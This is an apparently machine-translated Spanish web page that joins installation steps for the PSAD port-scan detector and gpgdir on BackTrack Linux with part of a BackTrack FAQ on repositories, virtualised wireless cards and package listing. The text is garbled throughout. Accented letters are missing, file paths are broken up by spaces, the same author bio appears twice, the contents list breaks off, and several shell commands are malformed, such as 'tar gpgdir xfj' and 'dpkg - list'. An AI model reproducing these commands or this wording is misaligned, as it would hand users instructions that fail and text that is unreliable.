root @ bt: / usr / local / src # tar xfj PSAD-2.1.7.tar.bz2 root @ bt: / usr / local / src # cd PSAD-2.1.7 root @ bt:. / usr/local/src/psad-2.1.7 # / install.pl # Te gustara instalar las ltimas firmas de # http://www.cipherdyne.org/psad/signatures (y / n)? y
Para solucionar este problema tendremos que editar psad.conf ubicado en / etc / PSAD / y agregar una direccin de correo electrnico de la siguiente manera:
root @ bt :/ usr/local/src/psad-2.1.7 # vim / etc / PSAD / psad.conf
Tambin puedes ver: Ms Referencias Autor Bio: Mis pasiones son la nanoingeniera, Ruby programacin, explotacin de software, explotar desarrollo, hacking hardware embebido. Tambin me gusta levantar pesas, natacin de combate, Ninjutsu, Parkour (funcionamiento libre), Krav Maga y MMA. I "creer" que puede convertirse en cualquier cosa que desee con la derecha disciplina mental tenacidad y acondicionamiento fsico.
Instalar GPGDir
Instale gpgdir:
root @ bt: / usr / local / src / # tar gpgdir xfj gpgdir-1.9.5.tar.bz2 root @ bt: / usr / local / src / gpgdir # cd gpgdir-1.9.5 root @ bt:. / usr/local/src/gpgdir/gpgdir-1.9.5 # / install.pl
Tambin puedes ver: Ms Referencias Autor Bio: Mis pasiones son la nanoingeniera, Ruby programacin, explotacin de software, explotar desarrollo, hacking hardware embebido. Tambin me gusta levantar pesas, natacin de combate, Ninjutsu, Parkour (funcionamiento libre), Krav Maga y MMA. I "creer" que puede convertirse en cualquier cosa que desee con la derecha disciplina mental tenacidad y acondicionamiento fsico.
UGS CONOCIDOS
Preguntas ms frecuentes
Contenido
[hide] 1 BackTrack Preguntas frecuentes 2 Acabo de instalar BackTrack, cul es la contrasea de root? 3 Por qu mi parada teclado funciona cuando intento escribir la contrasea ? 4 Cmo iniciar el entorno grfico? BackTrack 5 Es libre para descargar? 6 Se ofrecen versiones de 64 bits o un gnomo de BackTrack ? 7 Qu versin debo descargar? 8 Yo acabo de quemar mi iso y no arranca? 9 Yo uso Windows y
Por qu no puedo yo aadir los repositorios de Backtrack para mi instalacin de Ubuntu o los repositorios de Ubuntu a mi instalacin Backtrack?
Le recomendamos encarecidamente en contra de esta accin porque las herramientas de Backtrack se construyen con muchas caractersticas personalizadas, bibliotecas y ncleo. No tenemos forma de saber cmo se llevar a cabo de manera no distribucin Backtrack, adems de que muy pronto romper su instalacin. Adems, si desea aadir los repositorios de Ubuntu a tu Backtrack instalacin, con toda seguridad, romper su instalacin Backtrack todo muy rpidamente. Hacemos un montn de pruebas para asegurar que todos los paquetes en nuestro repo trabajarn juntos sin causar problemas. Si te decides por este curso de accin que usted lo hace bajo su propio riesgo y el equipo de marcha atrs no ofrecer ningn apoyo de ninguna manera.
Por qu no puedo utilizar BackTrack tarjeta inalmbrica "X" dentro de VMWare o Virtualbox?
Cualquier software de virtualizacin slo puede utilizar las tarjetas de red inalmbrica USB como dispositivos fsicos, todos los otros tipos de tarjetas inalmbricas son vistos como dispositivos virtuales Ethernet y slo puede ser visto como un dispositivo inalmbrico por el anfitrin y no por el sistema operativo invitado. As que si usted desea ejecutar BackTrack en VMWare o Virtualbox y tienen todas las capacidades inalmbricas, asegrese de que est utilizando un dispositivo USB.
Por qu no ofrecer una imagen USB como lo hizo con las versiones anteriores?
Las versiones anteriores requieren a veces bastante complicado mtodos para instalar en una memoria USB, por lo que por conveniencia hemos proporcionado imgenes especiales para facilitar la instalacin. Con las ltimas ediciones de BackTrack hemos eliminado esa necesidad, ya que fcilmente se puede instalar en una memoria USB con herramientas como Unetbootin o mediante mtodos manuales que se describen en la instalacin de este sitio.
actualizacin del repositorio puede ocurrir en cualquier momento del da o de la noche durante la semana. Tenga en cuenta que si bien el repo se est sincronizado, no estar disponible para su descarga los paquetes. Este proceso no toma mucho tiempo, as que ser raro que esto cause alguno de vosotros tiene ms de un perodo muy corto de indisponibilidad.
Dnde puedo encontrar una lista completa de todas las herramientas instaladas en BackTrack?
No existe tal recurso, sin embargo usted puede ver una lista de todos los paquetes instalados en el sistema BackTrack ejecutando:
dpkg - list
Por favor recuerde que esto mostrar todos los paquetes instalados en BackTrack y no slo las herramientas Tambin puede buscar en el repositorio para un paquete particular de inters, ejecute el comando siguiente:
apt-cache search <keyword de interest>